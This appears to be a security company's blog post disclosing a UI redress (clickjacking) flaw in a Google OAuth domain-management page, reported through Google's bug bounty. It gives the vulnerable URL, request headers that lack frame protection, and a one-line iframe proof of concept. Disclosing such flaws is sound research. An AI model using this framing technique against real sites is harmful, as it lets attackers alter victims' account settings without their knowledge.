Google OAuth Target URL and Domain Description Vulnerable to UI redress attack

securelayer7-services
SecureLayer7 Launches Information Security Testing Services
January 31, 2015
RevSlider Vulnerability
Malware Cleanup: Analysis of an Undetectable web-shell code uploaded via RevSlider Vulnerability
March 9, 2015

March 7, 2015

Over last 3 years, I’ve participated in the Google Reward Program and found some relatively serious vulnerability. Google OAuth Target URL, Upload X.509 Cert and Domain Description Vulnerable to UI Redress Attack is my one of the oldest finding in Google Reward program. UI Redress Attack is basically a well known attack in the Info Sec community. Also, for those who are new to UI Redress Attack, find information here.

According to Wiki, OAuth is an open standard for the purpose of authorization, it provides client applications a secure access on behalf of a resource owner.

The following URL was vulnerable to UI Redress Attack :

https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com

As a result of using this vulnerability, the attacker is able to update victim’s OAuth Information including Target URL, Upload X.509 Cert and Domain Description.

The following Header information was passing to Google server and you can identify XFO Header information is missing.

Host: accounts.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

 

Following is sample POC:

<iframe src = “https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com” width=”600″ height=”600″>

Google UI Redress Attack

Google UI Redress Attack

In next blog post I’ll be posting another Relatively Critical Google Vulnerability.

Follow to our blog via Twitter or email and stay updated.

Discover more from SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management

Subscribe now to keep reading and get access to the full archive.

Continue reading

Enable Notifications OK No thanks